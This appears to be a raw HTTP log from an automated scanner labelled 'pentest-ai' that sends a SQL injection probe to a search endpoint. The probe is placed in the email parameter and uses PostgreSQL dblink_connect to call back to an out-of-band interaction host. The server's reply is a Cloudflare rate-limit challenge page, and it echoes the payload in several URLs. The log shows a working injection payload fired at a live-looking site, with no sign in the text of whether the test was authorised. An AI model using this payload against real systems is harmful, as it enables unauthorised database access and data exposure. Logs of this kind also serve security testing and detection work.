REQUEST:
GET https://my.myfirst.tech/search?email=%27%3B%20SELECT%20dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zg47096f7g66b7.oast.fun%20user%3Dx%20password%3Dx%20dbname%3Dx%27%29%3B--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9784
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c84768ccdca110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=E5Ikq6RUusEzT7r2y8C%2BqjoQO1KC3y05x%2Flnv8F7K1xtc0%2BLOh6ZSHlg8VTrzIkaDzepnwwtR5B8M3jGw6Xw2mG5JovFmLSBmz42NiLzi3h9w82UFTvHscZ%2FHfweL9JuoUSwdD51VRgwxQDMqA%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c84768ccdca110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'J7PnPC_mjRA7Kz8eksSTV_Al8I15vikNYKG23rw12TU-1784281161-1.2.1.1-HmXjK69xQOx0vfYNmL85SOYWwb9Y5HPladNmFRi_cVFdUVSQg9OA_72kFhtOSBfu',cITimeS: '1784281161',cRay: 'a1c84768ccdca110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?email=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zg47096f7g66b7.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_tk=jhSpbfNgnc.HjwYUL0I7VvDNdJPfFcSuRmL.XAyxuS8-1784281161-1.0.1.1-sHMPn.s9ZBGv8DIAEYmmbKWiQWBi01jYnU.ufIZzi8A",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?email=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zg47096f7g66b7.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_f_tk=jhSpbfNgnc.HjwYUL0I7VvDNdJPfFcSuRmL.XAyxuS8-1784281161-1.0.1.1-sHMPn.s9ZBGv8DIAEYmmbKWiQWBi01jYnU.ufIZzi8A",md: 'cRA2YIDiyrWZPneS4RY2Ne44v9n3831dB7dqRstQb2M-1784281161-1.2.1.1-xlyPZreg19YJ.B_1OoEF6A5P8StgKedtPhwGK2U92Bp7vOgk8FM0YxHo.UPun8U0.8vavDkuFR2ywUxsgyUGudfG_LXg_TxxUGE6FzRuoPwpniFWmymQsNkoVPlAqcufTT2smjSArUGNnmq.qFnKoIxIoHBQTmZywSD6POE4Ko3PqONJHT9N96kkWUHH_C16YtFqTCRltD3llaeqJFcCnLzHGOiN7It05Ix125AvpR_iI84wTIOZMztPUOi7B1xqhDp3xdkh.f8J88Bs2nL7WHZVidAQAZQF_aXXe_HzLN1vKeXREhoxceaacfwOLtAZz.n1U8iKkz5fFkcjxZGpKNc57Xw54l16NC7w6aJlKX_M7psu7hARXqwlLNGo.PMaz6XwJEfkYKUfIvekYXqCsQOVwt6_F5w55trmHJ77G85e66fRwn7jbz.ULdVI2x0GXFoCVuDjkQWPNRQjEhGQgluEEpcgEEELjYZwz9cxlyO9wJ.eqW0MBCLmpbSmCxYxperMxukKsjkznjACxyXeoaBT6jrrxq.ovplX64x.ZpkugMkfwse9AkPSBptushqaF4KKqqFwQRks1e6W_9EW6xz318jAw7TNUp.PwDvhzI0DEgh9pgyubvcHUWEG8Wk06HkNnyJjxC7WUHWjyTN6X2POncPdKAasSyZVRY618N54y0B2QvbO_MmDnIG94wEeb4dqSQJ1E0crjYqJ.IZKlseczAyqwKBXOzOaHxSBmu1V.Pn5nslg6XPLGASSd2xQo10061Cr91wAIezy6EEEhyOfTpxdRvpWSq8eZFekOLLWd6Lqs7aoQq5MzL.NLZScO5OnXb.2p4OnLbokJpyVY3shBz5_LAlA19rp27IiBjW5Cmq4HHt5coxrbfrqIJfcRsAHvs99XPQiF4ab8ejFOhR5GkZ2A33w5uFIjb0v.UfB_4ZGO_v7SmNCO.8HvdvAckurkDmuPZd4RtLU1GWG68abdB1UJtyNhkvwFqX72Iev6k0DqUV_sBRTNZBpOqC202UW99Wur5caStinKGn0ml3FiQeegl54uiotE8LHL9GWLaVocfxWcqYwxLRgmT.6VxG8LZHhfs1rTl_Q1ypyWcr.AyUzNjjCRyURPJarwLVCf60toGV6xY1gt.6qUSax_vMzx00XmCBrezl_hJSDLuwtNzDRy7RqVH99jbBD8gIxveJ7LdZDjCmUOz3DrRdYTIeTznvxs6uav8cuFaqZFnQa42Kj8RUye8fGjq29Z0MPHD7zfLIbYasq5_jurEqryDUTSpd29dw4IOmqFMn5RHhNwrj6dxKhS5Oi6tw0OAkoYUF7iUrMmgwbWWbU67fL',mdrd: 'XkLLgT_E7lqar.YyhqFo3KgwIlBV57eMzTBglJ.SKik-1784281161-1.2.1.1-ve0KpZRyjP71HsfxP42w56IaNZl8mnkIhRWyW_S2khO6Aq4SXMbwMh2ojAcdYCub9fjnOK2m0l4LKWsTL2eFT5l3XPVqro6vTWgqs9HiZ9q8gGtkmxH3znMQ4YJPu3RnXEKnkAOD_oCeewM0t0B8AblT13kmJTYekbuvNSkq_B.EoyC2oQbNmab7OKVrq55kQ9OhKSCjQwhr8BRQNgHb4BeJcoY9YsghUo_PMFxDFzgZ8MzrvbteYf89fzRiD46B',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c84768ccdca110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?email=%27%3B+SELECT+dblink_connect%28%27host%3Dh0cqg45t8jh21623dc0zg47096f7g66b7.oast.fun+user%3Dx+password%3Dx+dbname%3Dx%27%29%3B--+-\u0026__cf_chl_rt_tk=jhSpbfNgnc.HjwYUL0I7VvDNdJPfFcSuRmL.XAyxuS8-1784281161-1.0.1.1-sHMPn.s9ZBGv8DIAEYmmbKWiQWBi01jYnU.ufIZzi8A"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
